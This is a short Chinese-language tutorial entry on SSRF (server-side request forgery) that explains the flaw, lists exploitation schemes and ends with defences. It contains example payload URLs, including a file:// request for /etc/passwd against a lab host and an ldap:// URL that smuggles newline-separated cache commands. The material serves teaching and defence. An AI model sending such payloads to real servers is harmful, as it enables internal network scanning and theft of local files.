15 常见漏洞 SSRF

SSRF是一种由攻击者构造请求，但是由服务器发起请求的漏洞

攻击者可以通过控制边缘服务器，来向隔绝的内部网络的主机发起请求

它的形成大多是由于服务器段提供了其他服务器应用获取数据的功能且没有对目标地址做过滤与限制

 

SSRF的利用

1.http协议

进行内网端口探测——判断端口开放与否，甚至可以访问到banner信息

2.file协议读取本地文件

如：

http://192.168.0.103/06/vul/ssrf/ssrf_curl.php?url=file:///etc/passwd

3.dict协议内网扫描

4.gopher协议

5.SFTP://

ssrf.php?url=sftp://example.com:11111/

6.TFTP://

ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET

7.LDAP://

ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

 

防御方案

禁止跳转

过滤信息

禁止不需要的协议

设置URL访问的白名单或限制内网IP

限制请求的端口为http常用端口